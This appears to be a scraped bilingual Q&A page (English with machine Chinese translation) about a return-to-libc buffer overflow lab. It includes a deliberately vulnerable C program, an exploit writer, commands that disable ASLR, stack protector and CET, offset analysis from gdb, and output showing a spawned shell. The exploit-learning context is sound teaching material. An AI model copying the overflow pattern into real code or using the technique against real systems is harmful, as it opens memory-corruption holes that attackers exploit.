[英]Return to libc buffer overflow attack
I tried to make a return to libc buffer overflow.我试图返回 libc 缓冲区溢出。 I found all the addresses for system, exit and /bin/sh, I don't know why, but when I try to run the vulnerable program nothing happens.我找到了 system、exit 和 /bin/sh 的所有地址,我不知道为什么,但是当我尝试运行易受攻击的程序时没有任何反应。 system, exit address /bin/sh address系统,退出地址/bin/sh 地址
Vulnerable program:易受攻击的程序:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:利用程序:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find MYSHELL address(for /bin/sh)这是我用来查找 MYSHELL 地址的程序(用于 /bin/sh)
#include <stdio.h>
void main()
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Terminal: Terminal image after run retlib终端:运行 retlib 后的终端图像
First, there are a number of mitigations that might be deployed to prevent this attack.首先,可以部署许多缓解措施来防止这种攻击。 You need to disable each one:您需要禁用每个:
sudo sysctl -w kernel.randomize_va_space=0
. ASLR :您已经使用sudo sysctl -w kernel.randomize_va_space=0
禁用。 But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash
.但更好的选择是仅对一个 shell 及其子级禁用它: setarch $(uname -m) -R /bin/bash
。-fno-stack-protector
.这可以使用-fno-stack-protector
禁用。-fcf-protection=none
.可以使用-fcf-protection=none
禁用此(以及其他一些 CET 保护)。 The question does not mention it, but the addresses used in the code (along with use of long
) indicate that a 32-bit system is targeted.问题没有提到它,但代码中使用的地址(以及long
的使用)表明目标是 32 位系统。 If the system used is 64-bit, -m32
needs to be added to the compiler flags:如果使用的系统是 64 位,则需要在编译器标志中添加-m32
:
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from shell are identical (at least in length).当从一个二进制文件确定环境变量地址并在另一个二进制文件中使用它时,它们的环境变量和来自 shell 的调用是相同的(至少在长度上)是非常重要的。 If one is executed as a.out
, the other should also be executed as a.out
.如果一个作为a.out
执行,另一个也应该作为a.out
执行。 One being in a different path, having a different argv
will move the environment variable.在不同的路径中,具有不同的argv
将移动环境变量。
Alternatively, you can print the address of the environment variable from within the vulnerable binary.或者,您可以从易受攻击的二进制文件中打印环境变量的地址。
By looking at the disassembly of bof
function, the distance between the buffer and the return address can be determined:通过查看bof
function的反汇编,可以确定缓冲区与返回地址的距离:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread@plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp)
is used as the first parameter to fread
, which is the buffer
that will be overflowed.请注意, -0x14(%ebp)
用作fread
的第一个参数,这是将溢出的buffer
。 Also note that ebp
was the value of esp
just after pushing ebp
in the first instruction.另请注意, ebp
是在第一条指令中推入ebp
之后esp
的值。 So, ebp
points to the saved ebp
, which is followed by the return address.因此, ebp
指向保存的ebp
,后面是返回地址。 That means from the start of the buffer, saved ebp
is 20 bytes away, and return address is 24 bytes away.这意味着从缓冲区开始,保存的ebp
距离为 20 个字节,返回地址距离为 24 个字节。
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:通过这些更改,shell 由易受攻击的二进制文件执行:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.